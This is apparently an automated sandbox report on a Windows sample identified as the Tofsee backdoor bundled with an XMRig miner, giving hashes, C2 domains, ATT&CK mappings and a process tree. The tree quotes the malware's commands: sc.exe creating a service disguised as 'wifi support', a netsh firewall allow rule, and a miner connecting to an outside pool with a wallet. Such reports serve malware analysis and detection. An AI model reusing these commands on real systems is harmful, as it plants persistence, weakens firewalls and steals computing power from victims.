Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    16-10-2021 11:43

General

  • Target

    0e066c7bfe338610bb051f13a37e14baaf9899122146931afc461ba805a4baca.exe

  • Size

    11.2MB

  • MD5

    4fcda8982434609b50e5a0b00dddba82

  • SHA1

    94aabe47b885ff7dc496feae55fe7627d29c6eea

  • SHA256

    0e066c7bfe338610bb051f13a37e14baaf9899122146931afc461ba805a4baca

  • SHA512

    c092e293e24f74041d9a280457737895601f049360dc25d1bdd804032fc96f7acf036f4152436433c6253b534eee3c75f4519470c2ba070f8536bc9592d392c8

Malware Config

Extracted

Family

tofsee

C2

defeatwax.ru

refabyd.info

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0e066c7bfe338610bb051f13a37e14baaf9899122146931afc461ba805a4baca.exe
    "C:\Users\Admin\AppData\Local\Temp\0e066c7bfe338610bb051f13a37e14baaf9899122146931afc461ba805a4baca.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1768
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xozavbdn\
      2⤵
        PID:1564
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cjhsxsgu.exe" C:\Windows\SysWOW64\xozavbdn\
        2⤵
          PID:472
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create xozavbdn binPath= "C:\Windows\SysWOW64\xozavbdn\cjhsxsgu.exe /d\"C:\Users\Admin\AppData\Local\Temp\0e066c7bfe338610bb051f13a37e14baaf9899122146931afc461ba805a4baca.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:620
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description xozavbdn "wifi internet conection"
            2⤵
              PID:1812
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start xozavbdn
              2⤵
                PID:456
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1164
              • C:\Windows\SysWOW64\xozavbdn\cjhsxsgu.exe
                C:\Windows\SysWOW64\xozavbdn\cjhsxsgu.exe /d"C:\Users\Admin\AppData\Local\Temp\0e066c7bfe338610bb051f13a37e14baaf9899122146931afc461ba805a4baca.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1168
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:1560
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1476

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              2
              T1112

              Discovery

              System Information Discovery

              1
              T1082

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\cjhsxsgu.exe
                MD5

                c1db2e0aa6b36e3a16735790c7a9600c

                SHA1

                1a8ef9dfd31b97335b7d84640e4b243b8141e11e

                SHA256

                aebcf76060502097d709d04002a5de9f435b0cd2180a2c6f5081ac797dbd1932

                SHA512

                309f8112d684e30e52b018892ab4d8025480d4b927c55cd9601eb0366301c65acaedcbc19e94fb557d96802d6694b5eb90488e8d9d6cd937b5e7861fa23bf562

              • C:\Windows\SysWOW64\xozavbdn\cjhsxsgu.exe
                MD5

                c1db2e0aa6b36e3a16735790c7a9600c

                SHA1

                1a8ef9dfd31b97335b7d84640e4b243b8141e11e

                SHA256

                aebcf76060502097d709d04002a5de9f435b0cd2180a2c6f5081ac797dbd1932

                SHA512

                309f8112d684e30e52b018892ab4d8025480d4b927c55cd9601eb0366301c65acaedcbc19e94fb557d96802d6694b5eb90488e8d9d6cd937b5e7861fa23bf562

              • memory/456-62-0x0000000000000000-mapping.dmp
              • memory/472-58-0x0000000000000000-mapping.dmp
              • memory/620-60-0x0000000000000000-mapping.dmp
              • memory/1164-63-0x0000000000000000-mapping.dmp
              • memory/1168-65-0x000000000223B000-0x0000000002249000-memory.dmp
                Filesize

                56KB

              • memory/1168-72-0x0000000000400000-0x0000000002149000-memory.dmp
                Filesize

                29.3MB

              • memory/1476-78-0x000000000025259C-mapping.dmp
              • memory/1476-74-0x00000000001C0000-0x00000000002B1000-memory.dmp
                Filesize

                964KB

              • memory/1476-73-0x00000000001C0000-0x00000000002B1000-memory.dmp
                Filesize

                964KB

              • memory/1560-70-0x0000000000089A6B-mapping.dmp
              • memory/1560-68-0x0000000000080000-0x0000000000095000-memory.dmp
                Filesize

                84KB

              • memory/1560-69-0x0000000000080000-0x0000000000095000-memory.dmp
                Filesize

                84KB

              • memory/1564-57-0x0000000000000000-mapping.dmp
              • memory/1768-54-0x0000000075821000-0x0000000075823000-memory.dmp
                Filesize

                8KB

              • memory/1768-53-0x00000000025AB000-0x00000000025B9000-memory.dmp
                Filesize

                56KB

              • memory/1768-55-0x0000000000220000-0x0000000000233000-memory.dmp
                Filesize

                76KB

              • memory/1768-56-0x0000000000400000-0x0000000002149000-memory.dmp
                Filesize

                29.3MB

              • memory/1812-61-0x0000000000000000-mapping.dmp